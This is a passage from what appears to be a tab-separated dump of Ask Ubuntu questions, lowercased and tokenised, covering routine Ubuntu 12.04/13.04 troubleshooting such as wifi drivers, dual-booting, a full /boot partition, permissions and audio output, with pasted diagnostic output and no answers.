) core ( tm ) i7-4700mq cpu @ 2.40ghz ( fam : 06 , model : 3c , stepping : 03 ) sep 2 11:18:52 isogen kernel : [ 0.063032 ] smpboot : total of 1 processors activated ( 4788.73 bogomips ) edit : but when i run sudo lshw -class cpu , i get this : *-cpu description : cpu product : intel ( r ) core ( tm ) i7-4700mq cpu @ 2.40ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i7-4700mq cpu @ 2.40ghz serial : to be filled by o.e.m . slot : u3e1 size : 2400mhz capacity : 2400mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 fma cx16 xtpr pdcm pcid sse4_1 sse4_2 movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid configuration : cores=4 enabledcores=4 threads=8 so it recognizes that it has 4 cores with 8 threads , as well as says that all 4 cores are enabled . it is also hyper-thread , so even if running only on one core , it should see two .
340527	prevent user from viewing and editing /var/www folders	i need to be able to restrict a secondary user that i 'm creating from even viewing /var/www as it contains some sensitive information in its php files . currently , the user is able to view the files ( but not modify them ) . how can i prevent them from even viewing the files without disallowing my web server ( apache ) from being able to read and execute them ?
340528	wired connection connected , but no internet access	i have hp compaq nx6310 laptop and i recently installed ubuntu 13.04 on it . i have a tp-link wr720n router connected to another system running on windows 8 pro . the problem is i can connect to the router but internet access is not available on my ubuntu system , but works fine with windows . please help me in this regard . the output of ifconfig : saumya @ saumya-hp-compaq-nx6310 : ~ $ ifconfig eth1 link encap : ethernet hwaddr 00:17:08:30:43:9b inet addr:192.168.0.101 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :217:8ff : fe30:439b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:674 errors:0 dropped:0 overruns:0 frame:0 tx packets:106 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:125357 ( 125.3 kb ) tx bytes:21771 ( 21.7 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:616 errors:0 dropped:0 overruns:0 frame:0 tx packets:616 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:47392 ( 47.3 kb ) tx bytes:47392 ( 47.3 kb ) the output of iwconfig : saumya @ saumya-hp-compaq-nx6310 : ~ $ iwconfig lo no wireless extensions . eth1 no wireless extensions . the output of nm-tool : saumya @ saumya-hp-compaq-nx6310 : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : eth1 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : b44 state : connected default : yes hw address : 00:17:08:30:43:9b capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.101 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 8.8.8.8 dns : 4.2.2.2 the output of ping -c2 192.168.0.1 : saumya @ saumya-hp-compaq-nx6310 : ~ $ ping -c2 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.0.1 : icmp_req=1 ttl=64 time=0.445 ms 64 bytes from 192.168.0.1 : icmp_req=2 ttl=64 time=0.158 ms -- - 192.168.0.1 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 999ms rtt min/avg/max/mdev = 0.158/0.301/0.445/0.144 ms the output of ping -c2 4.2.2.2 : saumya @ saumya-hp-compaq-nx6310 : ~ $ ping -c2 4.2.2.2 ping 4.2.2.2 ( 4.2.2.2 ) 56 ( 84 ) bytes of data . 64 bytes from 4.2.2.2 : icmp_req=1 ttl=46 time=446 ms 64 bytes from 4.2.2.2 : icmp_req=2 ttl=46 time=280 ms -- - 4.2.2.2 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1000ms rtt min/avg/max/mdev = 280.625/363.365/446.105/82.740 ms
340530	how can i check the available version of a package in the repositories ?	how can i check the version of the available package in the ubuntu repositories without installing it ?
340532	dual-booting ubuntu 13.04 with windows 7 . having problems	i was running ubuntu 12.10 alongside my windows 7 home premium using wubi . i was not able to figure out how to upgrade to 13.04 . then after i found out wubi had been discontinued and it might cause problems , i ultimately decided to uninstall my whole linux system and re install with 13.04 from a boot disk . just to make sure i did everything right , i watched this videodual boot ubuntu 13.04 and windows 7 ( easiest way ) on youtube on how to do it . ( it 's pretty idiot proof ... or so i thought ... ) the only thing i have done different is i used the default windows disk burner instead of image burn and i have a 64 bit system instead of a 32 bit . i have gone into the bios and changed it to start with the boot disk and i get to setting up ubuntu . when i get to the `` how do i want to install ? '' page i do n't have the option to run alongside windows 7 . i have the option to run inside windows 7 . i do n't want to replace my windows 7 mainly for school and work reasons ( have to have office and ie etc ... ) but i also really like ubuntu . i pick the run inside option because that 's the closest one to running alongside and my computer restarts and my disk tray pops out . then it reboots into windows and i have to start the process over . i have downloaded the .iso twice from the ubuntu download page and have made two seperate boot disks and the same thing happens on both of them . is there anyone who can help me ? my current windows 7 system is as follows : hp pavilion dv7 1 tb hard drive windows 7 home premium ( 64-bit ) intel core i7-3610qm cpu @ 2.30 ghz 8 gigs of ram thanks for any help you can provide ! thanks !
340538	trying to install 13.04 and computer wo n't detect bootable usb drive as a bootable usb drive ( solved )	i have a hp computer with windows 7 that does not operate properly . windows only works for a few seconds to a few minutes before showing a blue screen and restarting . i am trying to install ubuntu from a 4 gb usb stick , but when i do that it has an x next to `` has at least 5.3 gb available drive space '' but the computer has well over 600 gb available . i think ubuntu thinks the usb drive is the hdd . i have been trying to install ubuntu since this morning . i can try ubuntu from this computer and that works fine . when i first turn on the computer and press f12 it does n't show the usb drive as something i can boot from . then windows boots and when it restarts due to an error it boots ubuntu . does anyone have any idea of how i could fix this and get it to install on the computer ?
340543	set up permissions for a secondary user	i have a user that i want to give read and write access to a folder in my root home ( /root/test ) is there a way to give them permission to only modify files in /root/test , but not /root itself ? also , this is kind of a side question , but how can i prevent this user from being able to view or edit the files in /var/www ? there are some php files in there which contain sensitive information . i have already tried chmod -r o-r /var/www but that prevented the webserver itself from working . thanks in advance !
340548	implementing private cloud	i want to implement private cloud for my college using free tools like open nebula etc so where to start ? or is there any step by step guide available ?
340549	boot error : no boot detected or disk has failed	possible duplicate but earlier questions did not solve my issue . i installed ubuntu 13.04 in my acer desktop . initially it was not able to start ubuntu on normal start up as priority was not set in bios . so , i set priority in bios but still i am getting above error during boot up . what could possibly happen ? disk error/installation problem ?
340552	broadcam wifi driver help	im setting up ubuntu for the first time . i downloaded the version 12 . my wifi card is bcm4313 i read the manual on how to get the wifi up and running : https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx i downloaded the bcmwl-kernel-source and followed the instructions . here is the problem i cant activate the driver . i get an error : sorry installation of this driver failed check /var/log/jockey.log and when i check it , terminal says no directory or file found . i need some help , because i cant get internet on the wifi . i tried google already but it didnt give me any usefull answers . many thanks in advance !
340557	how do i install the any package from privates ppa without needing ubuntu software center ?	i have ubuntu 13.04 , and i am able to install intellij ce via the ubuntu software center . when i do so i see it as an installed debian package : zippy1981 @ scala-dev : ~ $ dpkg -- get-selections |grep intellij intellij-idea-ce install the repository for it seems to be https : //private-ppa.launchpad.net/commercial-ppa-uploaders/intellij-idea-ce/ubuntu/ : maya @ ubuntu : ~/documents/src/scala $ apt-cache policy intellij-idea-ce intellij-idea-ce : installed : 12.1-0ubuntu1 candidate : 12.1-0ubuntu1 version table : *** 12.1-0ubuntu1 0 500 https : //private-ppa.launchpad.net/commercial-ppa-uploaders/intellij-idea-ce/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/status however , if i do add-apt-repository https : //private-ppa.launchpad.net/commercial-ppa-uploaders/intellij-idea-ce/ubuntu/ and apt-get update that repo gives me an error and apt-get install intellij-idea-ce does not find the package . is there a way to install this without the use of the software center ?
340561	install ubuntu 12.04 bootloader issues	i am trying to install ubuntu 12.04 over windows 7 using a usb drive . however , i am not able to install it . installation breaks saying that `` bootloader can not be installed on this device . '' in the details section , i see the ubiquity message saying that it ca n't read the partition from dev/sda . i 've tried various things , boot-repair one among them ( http : //paste.ubuntu.com/6056191/ ) , but no luck . what am i exactly doing wrong ?
340562	netinstall pxe for ubuntu 13.04 keeps rebooting	when i try to perform a netinstall with the 13.04 kernel/initrd the pc keeps rebooting without installing anything . the pc starts with pxe , downloads kernel from tftp , downloads the initrd and immediately after reboots , without any error message or any pause time . i ca n't even find any way to debug my configuration , because it restarts immediately without any feedback . any suggestion ? anybody got this netinstall working ?
340565	latest ubuntu on dell xps 12	i am planning on buying a dell xps 12 at the end of the week so i can replace my laptop and my tablet and have both all in one device . i am very attracted to this concept , however i love ubuntu as opposed to windows . this will be a huge selling point as to whether i do purchase the computer or not . i have researched this and keep getting mixed answers on the subject so i figured i would go straight to the source ans as ubuntu themselves . is there any way to put the latest ubuntu onto the dell xps 12 and still have full functionality on it in both laptop mode and tablet mode ?
340566	ubuntu 13.04 installation fail on asus s551lb ( hybrid graphics )	i 've just purchased a new asus s551lb . it comes with an i7 4500u and nvidia geforce 740m , with the nvidia optimus feature ( hybrid graphics ) . the full specification can be found at asus vivobook s551lb i am trying to install ubuntu 13.04 and failing badly . during the installation it seems fine , until it we restart the laptop and try to boot it for the first time . the error message says : 8.679154 ] nouveau e [ device ] [ 0000:04:00.0 ] unknown chipset , 0x108120a1 8.679179 ] nouveau e [ drm ] failed to create 0x80000080 , -22 15.030164 ] mei 0000:00:16.0 : init hw failure . 15.030230 ] mei 0000:00:16.0 : initialization failed . after i force shutdown the laptop and boot it for the second time , i do not see the message again - but just a blank screen . i 'm quite lost in the dark on where to start debugging . i 've done hairpulling lots of google-ing without finding any result . any help on how i can successfully install ubuntu 13.04 is very much appreciated . thank you everyone .
340571	atheros ar9002wb-1ng wifi does n't work	i installed 13.04 ubuntu on my asus u82u today and i ca n't find a way to fix the problem.i 've tried almost everything , even reinstalled and tried on linux mint . wifi worked fine with windows 8 . any suggestions ? 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati wrestler [ radeon hd 6320 ] 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] 00:04.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:15.0 pci bridge : advanced micro devices [ amd ] nee ati sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices [ amd ] nee ati sb700/sb800/sb900 pci to pci bridge ( pcie port 1 ) 00:15.2 pci bridge : advanced micro devices [ amd ] nee ati sb900 pci to pci bridge ( pcie port 2 ) 00:15.3 pci bridge : advanced micro devices [ amd ] nee ati sb900 pci to pci bridge ( pcie port 3 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 04:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 0a ) 05:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 06:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) sudo rfkill list 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : hci0 : bluetooth soft blocked : yes hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : yes
340577	intel i915 tearing issues	i 'm using foss intel graphics drivers with kernel 3.8.0-29 and kubuntu 13.04 . there seems to be video tear at the top of my screen . it 's apparent when i 'm dragging windows around or playing video back in full screen . i 've been googling and apparently there 's a tear free option that i can put into an xorg.conf file ? however , i do not have an xorg.conf file and i am not familiar with the syntax to set one up . so this is really a 2 part question . 1 ) i 'd like to try to xorg.conf option , so what would i need to put into the file to set it up ? 2 ) if that 's not the way to fix this , has anyone found a way to fix it ? i 'm not looking to disable compositing , as it 's just the top of the screen and i can sort of deal with it , but it 's bumming me out . thanks .
340579	how to install gnuplot in ubuntu	i want to install gnuplot in my ubuntu12.04 . when i try it shows : forhad @ forhad-desktop : ~ $ sudo apt-get install gnuplot [ sudo ] password for forhad : reading package lists ... done building dependency tree reading state information ... done gnuplot is already the newest version . the following packages were automatically installed and are no longer required : language-pack-zh-hans language-pack-kde-en language-pack-kde-zh-hans language-pack-kde-en-base kde-l10n-engb kde-l10n-zhcn language-pack-zh-hans-base firefox-locale-zh-hans language-pack-kde-zh-hans-base use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 39 not upgraded . forhad @ forhad-desktop : ~ $ what to do ?
340582	ubuntu 13.04 display problem ( samsung ativ book 9 lite )	i 'm into trouble for few days and i really need help . so , i 've got a new laptop ( samsung ativ book 9 lite ) and installed ubuntu 13.04 ( 64bit ) . now everything look good but my graphical display is very bad ( launcher does n't take opacity and always displaying 1px border-right even it 's hidden , windows are very slow etc.. ) . actually i 'm not prof-tech-man and i 'm just stuck ! q : what i need to do any more or am missing ? thanks in advance . here is some infos ; kerem @ kerem : ~ $ sudo lshw -c video *-display unclaimed description : vga compatible controller product : kabini [ radeon hd 8250 ] vendor : advanced micro devices [ amd ] nee ati physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : c0000000-cfffffff memory : d0000000-d07fffff ioport : f000 ( size=256 ) memory : feb00000-feb3ffff memory : feb40000-feb5ffff seems not all ok ; kerem @ kerem : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) opengl version string : 2.1 mesa 9.1.3 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no also i saw this and : https : //wiki.ubuntu.com/x/hybridgraphics kerem @ kerem : ~ $ dpkg -l fglrx\* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= un fglrx-glx < none > ( no description available )
340583	how to write an awk script that catch ping 's time	in this line : reply from 10.11.12.13 time=1035ms how to write an awk script which brings out just 1035 .
340584	boot is full ca n't get apt-get to upgrade	i 've followed most instructions an clearing boot found on the interwebs , i 'm a bit n00bish on linux inwards i use it mostly for web dev testing , but am pretty good at following command instructions ; ) unfortunately my box seems to be stuck with the /boot full and i ca n't get my head around the correct steps to get clear it . i believe i ca n't clean the boot because kernel 39 is pending install , but i can remove it from pending install because the boot is full ? this is the sequence of steps i attemped : pedro @ lamp01 : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 창apt-get -f install창 to correct these . the following packages have unmet dependencies . linux-image-generic-lts-quantal : depends : linux-image-3.5.0-39-generic but it is not installed e : unmet dependencies . try using -f. pedro @ lamp01 : ~ $ sudo apt-get purge $ ( dpkg -l linux- { image , headers } - '' [ 0-9 ] * '' | awk '/ii/ { print $ 2 } ' | grep -ve `` $ ( uname -r | sed -r 's/- [ a-z ] +// ' ) '' ) reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . linux-headers-generic-lts-quantal : depends : linux-headers-3.5.0-39-generic but it is not going to be installed linux-image-generic-lts-quantal : depends : linux-image-3.5.0-39-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . pedro @ lamp01 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.5.0-32-generic linux-headers-3.5.0-27-generic linux-headers-3.5.0-30-generic linux-headers-3.5.0-28-generic linux-headers-3.5.0-30 linux-headers-3.5.0-31 linux-headers-3.5.0-26 linux-headers-3.5.0-32 linux-headers-3.5.0-27 linux-headers-3.5.0-28 linux-headers-3.5.0-31-generic linux-headers-3.5.0-26-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-3.5.0-39-generic suggested packages : fdutils linux-lts-quantal-doc-3.5.0 linux-lts-quantal-source-3.5.0 linux-lts-quantal-tools the following new packages will be installed linux-image-3.5.0-39-generic 0 upgraded , 1 newly installed , 0 to remove and 27 not upgraded . 3 not fully installed or removed . need to get 0 b/40.7 mb of archives . after this operation , 157 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 269199 files and directories currently installed . ) unpacking linux-image-3.5.0-39-generic ( from ... /linux-image-3.5.0-39-generic_3.5.0-39.60~precise1_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-39-generic_3.5.0-39.60~precise1_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.5.0-39-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-39-generic /boot/vmlinuz-3.5.0-39-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-39-generic /boot/vmlinuz-3.5.0-39-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.5.0-39-generic_3.5.0-39.60~precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) pedro @ lamp01 : ~ $ it 's a bit odd the autoremove appears to be forcing the install , the current kernel is 37 : pedro @ lamp01 : ~ $ uname -a linux lamp01 3.5.0-37-generic # 58~precise1-ubuntu smp wed jul 10 17:48:11 utc 2013 x86_64 x86_64 x86_64 gnu/linux can anyone help ? many thanks , p .
340585	no network device available	output - sudo lshw -c network *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:16 memory : efcfc000-efcfffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : ef9fe000-ef9fffff output - ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:259 errors:0 dropped:0 overruns:0 frame:0 tx packets:259 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:33926 ( 33.9 kb ) tx bytes:33926 ( 33.9 kb ) content of path - etc/udev/rules.d/70-persistent-net.rules # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1e.0/0000:03:00.0/ssb1:0 ( b44 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:19 : b9:5a : f6 : eb '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' output - sudo ifconfig eth0 eth0 : error while getting interface flags : no such device output - sudo ifup eth0 ignoring unknown interface eth0=eth0 .
340586	can i change between oses ?	sorry if this is a noob question , but i 'm new . i 'm running on os x so , if i download and install ubuntu and i start using ubuntu , but for some reason i want to use osx for a while to see something , can i change to osx and then go back to ubuntu ? ?
340590	where to find and how to use ubuntu 's version of windows 's run dialog ?	i 'm switching over from windows to ubuntu , and i want to know how to get the functionality of windows run dialog in ubuntu . in windows , i just go to the start button , and enter in the search field run , and the run dialog pops up . i mainly use this program to connect to servers in my network by typing \\ + the name of the server . how do i replicate this functionality in ubuntu ? do i use the command line ? i 've read elsewhere about an old gnome program called `` run '' that i can get by installing the compizconfig settings manager , but i do n't know if this is what i want .
340596	no wireless on aspire one d257 ubuntu 12.04	iâ´m lost in wireless connection . after installation of ubuntu , there is no wireless driver availalble ( `` wireless '' not appearing in the menue ) . strange , as it worked when starting ubuntu from cd ... . installing the additional wireless sta driver fails . using : acer aspire one d257 with broadcom bcm 4313 802 11b/g/n wireless adapter ; ubuntu 12.04 please excuse me being a simple user only , not an expert and yes , i still staggered per tons of tipps how to solve the problem . if possible , please post a simple instruction how to solve the problem . thanks a lot ! ! !
340600	ca n't access to ubuntu 13.04 after installing it alongside with windows 7	after installing ubuntu 13.04 alongside with windows 7 , my laptop restarted but entered to windows 7 without letting me choose between 7 & ubuntu ! ! my laptop ( lenovo g580 )
340603	sqlite installation	i 'm installing sqlite like this sqlite - installation i get this error , anyone know what to do ? anonymous @ anonymous : ~/sqlite-autoconf-3080001 $ make install make [ 1 ] : entering directory `/home/anonymous/sqlite-autoconf-3080001' /bin/mkdir -p '/usr/local/lib' /bin/bash ./libtool -- mode=install /usr/bin/install -c libsqlite3.la '/usr/local/lib' libtool : install : /usr/bin/install -c .libs/libsqlite3.so.0.8.6 /usr/local/lib/libsqlite3.so.0.8.6 /usr/bin/install : can not create regular file `/usr/local/lib/libsqlite3.so.0.8.6 ' : permission denied make [ 1 ] : *** [ install-libltlibraries ] error 1 make [ 1 ] : leaving directory `/home/anonymous/sqlite-autoconf-3080001' make : *** [ install-am ] error 2 anonymous @ anonymous : ~/sqlite-autoconf-3080001 $ sorry i do n't know the proper way of putting it in
340608	how do i download tv shows , etc . ?	what do i have to do to download from the pirate bay ? i understand utorrent and the pirate bay , but can not download movies . i used to be able to do it in windows . please keep explanations simple . i want to watch my tv shows when overseas .
340609	after instalation sml/nj - no command 'sml ' found on ubuntu 12.04 at terminal	i installed sml/nj according this instruction downloads unix : the only file you need to download manually is config.tgz . unpack , configure by editing config/targets , and install by running config/install.sh . the installer automatically downloads any additional files it might need . for more information , see install . i did n't configure config/targets and let it by default . i installed all this in /usr/local/sml/configure after this i run from sml folder - config/install.sh it build all necessary dependance as ml-lpt.tgz , cml.tgz ... into sml folder ( i checked ) . but after prompt config/install.sh : installation complete . i checked typed sml at terminal : nazar_art @ nazar-desctop : /usr/local/sml $ sml no command 'sml ' found , did you mean : command 'wml ' from package 'wml ' ( universe ) command 'smi ' from package 'scmxx ' ( universe ) command 'smc ' from package 'smc ' ( universe ) command 'sma ' from package 'sma ' ( universe ) command 'sol ' from package 'aisleriot ' ( main ) command 'sm ' from package 'sm ' ( universe ) command 'sl ' from package 'sl ' ( universe ) sml : command not found it should be smt like this - standard ml of new jersey v110.75 [ built : ... ] edit : after running ls -l /usr/local/sml/ : nazar_art @ nazar-desctop : ~ $ ls -l /usr/local/sml/ total 8668 drwxrwxr-x 3 nazar_art nazar_art 4096 sep 2 23:35 base drwxrwxr-x 4 nazar_art nazar_art 4096 sep 2 23:47 bin -rw-rw-r -- 1 nazar_art nazar_art 5848139 sep 29 2012 boot.x86-unix.tgz drwxr-xr-x 5 nazar_art nazar_art 4096 sep 29 2012 ckit -rw-rw-r -- 1 nazar_art nazar_art 194523 sep 29 2012 ckit.tgz drwxr-xr-x 5 nazar_art nazar_art 4096 sep 29 2012 cml -rw-rw-r -- 1 nazar_art nazar_art 105902 sep 29 2012 cml.tgz drwxr-xr-x 4 nazar_art nazar_art 4096 sep 3 00:00 config drwxrwxr-x 36 nazar_art nazar_art 4096 sep 2 23:37 lib drwxr-xr-x 5 nazar_art nazar_art 4096 sep 2 23:47 ml-burg -rw-rw-r -- 1 nazar_art nazar_art 36339 sep 29 2012 ml-burg.tgz drwxr-xr-x 4 nazar_art nazar_art 4096 sep 2 23:47 ml-lex -rw-rw-r -- 1 nazar_art nazar_art 33154 sep 29 2012 ml-lex.tgz drwxr-xr-x 8 nazar_art nazar_art 4096 sep 29 2012 ml-lpt -rw-rw-r -- 1 nazar_art nazar_art 256313 sep 29 2012 ml-lpt.tgz drwxr-xr-x 40 nazar_art nazar_art 4096 sep 29 2012 mlrisc -rw-rw-r -- 1 nazar_art nazar_art 1422655 sep 29 2012 mlrisc.tgz drwxr-xr-x 7 nazar_art nazar_art 4096 sep 29 2012 ml-yacc -rw-rw-r -- 1 nazar_art nazar_art 99940 sep 29 2012 ml-yacc.tgz drwxr-xr-x 4 nazar_art nazar_art 4096 sep 29 2012 nlffi -rw-rw-r -- 1 nazar_art nazar_art 74481 sep 29 2012 nlffi.tgz -rw-rw-r -- 1 nazar_art nazar_art 324054 sep 29 2012 runtime.tgz drwxr-xr-x 17 nazar_art nazar_art 4096 sep 29 2012 smlnj-lib -rw-rw-r -- 1 nazar_art nazar_art 396628 sep 29 2012 smlnj-lib.tgz drwxr-xr-x 3 nazar_art nazar_art 4096 sep 2 23:37 trace-debug-profile -rw-rw-r -- 1 nazar_art nazar_art 3902 sep 29 2012 trace-debug-profile.tgz - why this happen ? - how to solve this trouble ?
340614	ubuntu freezes after inputting the password	i went to use ubuntu today . it updated and asked to me to restart the pc , which i did but now i ca n't log in . when i put in my password it stays on the orange screen and freezes . the only thing i can do is move the mouse cursor . does anyone know what the problem is and how i could solve it ?
340615	how to mount ext4 drives from another system	i had a testbed 13.04 server which had a boot volume partitioned into three , root , swap and workspace as well as two other drives running in raid 1 . the workspace and raid volumes were setup using lvm and mdadm under webmin and formatted with ext4 . i reinstalled ubuntu 13.04 onto the same system , deleting the root and swap partitions first . now when i attempt to mount the volumes under webmin it fails with the error : mount : wrong fs type , bad option , bad superblock on /dev/mapper/ubuntux64 -- vg-workspace , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so looking at dmesg it shows the error : ext2-fs ( dm-0 ) error could n't mount because of supported optional features the volume is formatted as ext4 so not sure why it is defaulting to ext2 . if i do an fdisk -l the volumes show but it says that they do n't have a valid partition table . i can manually mount the volumes at the command line specifying ext4 but how can i correct the partition table error which i think is causing ubuntu to default to ext2/3 ?
340618	ubuntu installation replacing of windows 7 without partitioning	i have already 5 drives in my pc . i want to install ubuntu replacing of win 7 on drive c without touching other drives . but how ?
340621	how to run mongodb with my username instead of default user mongodb	i want to run mongodb service by my defined username and group instead of using mongodb user . how can i change from mongodb user to mydesiredusername ?
340622	no sound via headphones with ubuntu 13.04	hopefully i am not asking a duplicate question , but all the answers i found so far did not help me . alsamixer channel is not muted and when i switch to headphone output via pulseaudio there is still no sound , however internal speakers are muted . here the output of pulseaudio -- dumb-conf : user @ user : ~ $ pulseaudio -- dump-conf # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-3.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = yes default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 6 default-channel-map = front-left , front-left-of-center , front-center , front-right , front-right-of-center , rear-center default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as 